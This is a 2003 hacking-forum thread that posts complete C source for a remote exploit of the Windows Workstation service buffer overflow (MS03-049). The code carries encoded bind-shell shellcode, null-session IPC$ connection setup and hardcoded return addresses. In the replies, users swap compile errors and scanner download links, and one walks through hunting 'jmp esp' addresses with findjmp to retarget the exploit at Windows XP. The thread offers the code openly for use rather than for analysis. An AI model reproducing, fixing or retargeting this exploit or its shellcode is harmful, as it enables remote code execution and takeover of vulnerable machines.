GaLiaRePt
Windows Workstation ms03-049 remote exploit for w2k&fat
Date: 2003-11-13

Author : Hanabishi
Download : http://www.security-corporation.com/downlo.../ms03-049-w2k.c

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
//#include <winsock.h>


/*
 * Signature assumed for the netapi32 export that main() resolves at run time
 * with GetProcAddress (NetAddAlternateComputerName, falling back to
 * NetValidateName): four wide-string pointers and a ULONG, returning int.
 */
typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);


/* Size in bytes of szBuffer, the buffer main() builds and passes as the
 * second (LPCWSTR) argument of the resolved export. */
#define SIZE 2048

/* mpr.lib: WNetAddConnection2 / WNetCancelConnection2.
 * Ws2_32.lib: htons. The netapi32 import library is not linked; the export is
 * looked up dynamically in main() instead. */
#pragma comment(lib,"mpr.lib")
//#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
//#pragma comment(lib,"user32.lib")

/*
 * Opaque payload bytes: a run of 0x90 (NOP) followed by data the original
 * author describes as a bind shell. main() writes the masked listening port
 * into this array at byte offset 423 (471-48) before copying it into
 * szBuffer, so the array must stay writable. Nothing in this listing lets the
 * remainder of the bytes be verified.
 */
unsigned char shellcode[] =
/* bindshell no RPC crash, defineable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";


/*
 * Entry point. Takes one argument, argv[1], a host name or address, and runs
 * straight through: connect to \\host\ipc$ with empty credentials, load
 * netapi32 and resolve one export by name, build a SIZE-byte buffer, pass it
 * as that export's second argument, print the return value and disconnect.
 *
 * Exit status is 0 on the usage path and on the normal path; 1 only when
 * LoadLibrary fails or neither export can be resolved. A failed
 * WNetAddConnection2 is reported but does not stop the run.
 */
int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];          /* byte buffer handed to the export as an LPCWSTR */
NETRESOURCE netResource;      /* only four fields are assigned below; the rest stay uninitialized */
int i=0;                      /* referenced only by the commented-out loop below */

unsigned short lportl=1234; /* listening port, host byte order here; matches "nc Ip 1234" in the usage text */
char lport[5] = "\x00\xFF\xFF\x8b"; /* 4 bytes + NUL; bytes 1-2 are overwritten with the port below */

char host[30];                /* "\\" + argv[1]; no length check before the sprintf below */
LPSTR hostipc[40];            /* declared as 40 pointers, used as a raw char buffer through a cast */
LPWSTR hostl[60];             /* declared as 60 pointers, used as a wide-char buffer through a cast */
if(argc<2) {
printf("Windows Workstation ms03-049 wkksvc.dll buffer overflow \
\nbug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(sbaa@163.net) 2003/11/14 ver 0.1\n \
Usage: %s IP \n \
nc Ip 1234\n",argv[0]);
printf("");                   /* no-op */
return 0;
}
/* argv[1] is copied unbounded into a 30-byte array: anything longer than 27
 * characters overruns host. The same unbounded copy then feeds hostipc. */
sprintf(host,"\\\\%s",argv[1]);
sprintf((char *)hostipc,"%s\\ipc$",host);

/* NETRESOURCE is only partially filled in; these four fields are the ones
 * WNetAddConnection2 reads for this call. lpRemoteName is "\\host\ipc$". */
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
// "\\\\192.168.6.7\\ipc$";



/* Empty password and user name; a non-zero result is logged but the original
 * early return is commented out, so the run continues either way. */
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failed\n");
// return 1;
}


/* The export is looked up dynamically rather than linked, so the binary
 * loads on systems where the first name does not exist. */
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failed\n");
return 1;
}


/* Prefer NetAddAlternateComputerName; if it is absent (the message assumes
 * that means an older Windows than XP/2003) fall back to NetValidateName. */
procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (you are not xp(2003)) \n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!\n");
return 1;
}
}


/* Fill the whole buffer with 0x90 first; the shellcode and the two fixed
 * 4-byte values below are then written on top at fixed offsets. */
memset(szBuffer, 0x90, sizeof(szBuffer));
/*
for( i=0;i<SIZE-4;i=i+4)
{

if((i+i/256)%256!=0) memset(szBuffer+i,i+i/256,1);
if((i+1)%256!=0) memset(szBuffer+i+1,i+1,1);
if((i+2)%256!=0) memset(szBuffer+i+2,i+2,1);
if((i+3)%256!=0) memset(szBuffer+i+3,i+3,1);
}
*/
/* Port patch: network byte order, placed in lport[1..2], then all four bytes
 * of lport are XOR-masked with a fixed constant. The XOR reads the char
 * array through a long* (type punning via pointer cast, not memcpy). The
 * masked bytes replace shellcode[423..426]; &lport is the address of the
 * array, so the same four bytes are copied. */
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&shellcode[471-48],&lport,4);
memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);   /* without the string's NUL */


/* The same fixed 4-byte value at offsets 1851 and 2017. The thread below
 * reports the value at 2017 as specific to the target's OS version. */
memcpy(szBuffer+1851,"\x1b\x4a\xfa\x7f",4);
memcpy(szBuffer+2017,"\x1b\x4a\xfa\x7f",4);

szBuffer[SIZE-1]=0;           /* terminate so the buffer reads as a string */

/* Converts host to a wide string in hostl (at most 60 wide chars). The second
 * parameter is the DWORD flags value; NULL (a pointer) is passed here, which
 * is what the gcc warning quoted later in the thread refers to. */
MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

/* C++ exception syntax, not C. szBuffer is a byte buffer but is passed as the
 * second LPCWSTR argument without conversion. The catch body is empty, so
 * anything raised by the call is discarded and execution falls through to
 * the printf below with ret unchanged. */
try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);

}

catch(...)
{

}

//ret=NetValidateName(hostl, szBuffer, NULL, NULL, 0);

printf("%d\n",ret);           /* raw return value of the export, or 0 if the call never returned normally */
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);   /* tear down the ipc$ connection (TRUE: forced) */
FreeLibrary(hInstance);
return 0;
}
Killahbee
hope I've some luck compiling this one!!
Schmiel
Compiled with Visual C, no error codes during compiling and building, but an error while using the code. I've checked the code but can't find an explanation for it..
Hope someone else will.

Good luck all smile.gif


tolf
Is this code still for 2000 SP4 FAT?
Schmiel
QUOTE
Windows Workstation ms03-049 remote exploit for w2k&fat


Think so tongue.gif
tolf
wacko.gif oops
ivan288
can anyone compile??
dozolax
couldnt compile
KoNh
QUOTE (ivan288 @ Nov 19 2003, 03:36 PM)
can anyone compile??

am waiting to see how long u will last over here ^^ that's my new game
Diablotic
Is it good? If yes please compile it for us.
Barvaz88
compiled, posting it now in File Downloads.
XtrA
hmm im new here..
can u give me direct line to this section?
File Download..
thanks
x1`
u need 50 posts before the download section appears smile.gif
just to let u know
x1`
heres the scanner for the exploit , x-scan 5 with ms03-049 scanner plugin
http://down.77169.com/
Diablotic
Um sorry but i dont understand Chinese, can you give me a link to the scanner, exploit also needed smile.gif
X-FloppY
hmm let me try compiling this one if i can make it i'll post
Fareway
thx - compiled by myself until i have access to the download section
Fareway
compiled well but there is a flaw in the code. It doesn't work because of an error while executing the exploit. Don't know where the error is because my c++ is not that good.
Axl
QUOTE (Diablotic @ Dec 20 2003, 06:27 PM)
Um sorry but i dont understand Chinese, can you give me a link to the scanner, exploit also needed smile.gif
Fareway
thx QuantumTopology for the translation but i think the download doesn't work at all. First you need to enter www.77169.com directly without a translater to get the download working but there is a problem with the server. Try again later.

Maybe someone can upload it directly to this place!

Regards
zero-maitimax
this is the normal link http://www.77169.com/Soft_Show.asp?SoftID=374

but i also can't download it.
psycho-lvlantis
you have to follow this way :

enter in the site here : http://down.77169.com/

after go to: http://down.77169.com/Soft_NewElite.asp (click on the green link at the top of the page on your right)

after select your program

and click on the link to download it

wink.gif
xaph
got the same problem! This super Chinese site is so fast ... ;-)!

FTP Mirrors are down, can't connect!

Can someone upload x-scan v.5 mb here`?
gospel
Exploit @ http://www.k-otik.com/exploits/11.12.MS03-049PoC.c.php

Here it says *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63;
// eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)

Must use the offset suitable for ur windows version(lang, 2k or xp & SPs) instead of 0x74fdee63.
The exploit says u can obtain the offset if u find the memory address for "jmp esp" in msafd.dll. For that, u can use a tool called FINDJMP (http://www.i2s-lab.com/Free-Tools/Findjmp.exe)

Example->

C:\Findjmp msafd.dll esp

Scanning msafd.dll for code useable with the esp register
0x77E42C75 jmp esp
0x77E44A50 jmp esp
Finished Scanning msafd.dll for code useable with the esp register
Found 2 usable addresses

However, this only works on Win2k. If u do the same on a WinXP, it won't find any address for "jmp esp" in msafd.dll. (dlls are different in different Windows versions) U can also check metasploit.com and see that WinXp gets no memory address for "jmp esp" in msafd.dll.

So, i was wondering which *.dll in my WinXp could i use in order to finding the memory address for "jmp esp" so i can use it as the offset in this exploit??
Then, it was told me to use wkssvc.dll instead for WINXP.

This is what i get with findjmp on my wkssvc.dll:

c:\findjmp wkssvc.dll esp
Scanning wkssvc.dll for code useable with the esp register
0x75109975 push esp - ret
0x7511A747 jmp esp
0x7511C890 push esp - ret
Finished Scanning wkssvc.dll for code useable with the esp register
Found 3 usable addresses

So, in the exploit code, i should write the 0x7511A747 directly in this line:

*(unsigned int *)(&szBuffer[2017]) = 0x7511A747;
// eip (jmp esp @ msafd.dll, use opcode search engine for more, but
// be aware that a call esp will change the offset in the stack)

and it'd work, uh?????????????????

Looking at the exploit code... i changed the three 0.0.0.0 ips into 127.0.0.1 so i'd see the results on my XP.

Ok...... after compiling and linking with mpr.lib (=mprlib.a) an error occurs during the exploit execution, a new window appears showing this message:


***********************************
Microsoft Visual c++ Debug Library

Debug Error!

Program: c:\xploit.exe
Module:
File: i386\chkesp.c
Line: 42

The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.

Anular, Reintentar, Omitir

***********************************

Ahhh... the shellcode works, it opens port 5555 and u can connect remotely with telnet or nc. However, my whole exploit execution doesn't get a new shell or even open 5555 on my XP sad.gif

Any ideas??

PD: I know for sure that this exploit works on a Win 2k sp4, so all i wanted was changing the offset for my Win Xp nosp instead!!!! For now, i'm not sure if this exploits runs on a WinXp cause its said that wkssvc.dll vuln. exploits are for Win2k + FAT32!! Anybody can confirm that this exploit runs on WinXp for sure??


Salu2
FakoLy
thanx for this exploit compiled it succefully with visual C smile.gif
the
QUOTE (Dickybob20 @ Dec 20 2003, 06:13 PM)
heres the scanner for the exploit , x-scan 5 with ms03-049 scanner plugin
http://down.77169.com/

thx for the link dude
canardwc
thanks for the link also (scan exploit)
[Ripper]
gonna give the scanner a try
thx mate wink.gif

...will also have a look at the exploit code
Neo2k
Does this exploit really work fine ? Because i've compiled it without errors but no results ...
Jimbras
Nice. gonna check it out. Hoping for success smile.gif
ganz2
very nice
maru
uhm,... you need a password if you want to unpack it. anyone got this?
xriddle
B.T.W.

The Pass is www.77169.com

And be careful my AV detected an IRC Trojan Virus on one of the files.

zero-maitimax
QUOTE (xriddle @ Dec 29 2003, 02:45 PM)
B.T.W.

The Pass is www.77169.com

And be careful my AV detected an IRC Trojan Virus on one of the files.

that's because he uses the same string to search for the exploit..
BillyJawz
QUOTE
The exploit says u can obtain the offset if u find the memory address for "jmp esp" in msafd.dll. For that, u can use a tool called FINDJMP (http://www.i2s-lab.com/Free-Tools/Findjmp.exe)


Thanks i didnt knew that tool..hope will help finding new offsets.
gospel
De nada BillyJawz!! This tool (findjmp) helped me a lot when i needed to get the offsets. At least, US guys can search them in metasploit, but i cant find there the offsets for my Win Spanish....

salu2
SSlot
This exploit looks promising, is the code clean ?
PowerOn
i cant compile...
any idea if this code is clean??
gamesen
compiled successfully although it seems to be missing something..
loco
cant compile with vis c ;
esorone
Me ether,
I cant compile it with vc++ :-(((

Hopefully i find a compiled one.

Greetz blink.gif
Photon
compiled it with no problem where's the attack button?
welldone
i search MS03-049 exploit by sbaa [v0.2].....any info?
adenek
thx a lot
Can somone compile it please

Viechnuss
I got errors by compiling this sploit:

gcc.exe -c wks_3.c -o wks_3.o -I"c:/Dev-Cpp/include"

wks_3.c: In function `main':
wks_3.c:152: warning: passing arg 2 of `MultiByteToWideChar' makes integer from pointer without a cast
wks_3.c:154: `try' undeclared (first use in this function)
wks_3.c:154: (Each undeclared identifier is reported only once
wks_3.c:154: for each function it appears in.)
wks_3.c:154: parse error before '{' token
wks_3.c: At top level:
wks_3.c:159: ISO C requires a named argument before `...'

wks_3.c:166: parse error before string constant
wks_3.c:166: warning: conflicting types for built-in function `printf'
wks_3.c:166: warning: data definition has no type or storage class
wks_3.c:167: parse error before '.' token
wks_3.c:167: conflicting types for `WNetCancelConnection2A'
c:/Dev-Cpp/include/winnetwk.h:252: previous declaration of `WNetCancelConnection2A'
wks_3.c:167: warning: data definition has no type or storage class
wks_3.c:168: warning: parameter names (without types) in function declaration
wks_3.c:168: warning: data definition has no type or storage class
wks_3.c:169: parse error before "return"

make.exe: *** [wks_3.o] Error 1

Execution terminated
Yellow_Blue
w00t #@!#!@#
cool exploit but who compile it ? ?
kebab1701
hmm i'll have to check this one smile.gif
hitu
QUOTE (gospel @ Dec 27 2003, 02:57 AM)
***********************************
Microsoft Visual c++ Debug Library

Debug Error!

Program: c:\xploit.exe
Module:
File: i386\chkesp.c
Line: 42

The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.

Anular, Reintentar, Omitir

***********************************

same error here sad.gif .. m on WinXP (SP1) too .. i think it doesn't work on XP dry.gif
nolimit
there is another version of this exploit that isn't file system dependent for XP, search the forum.
This exploit would be awesome if it wasn't only FAT, any decent server uses NTFS.
welldone
sad.gif blah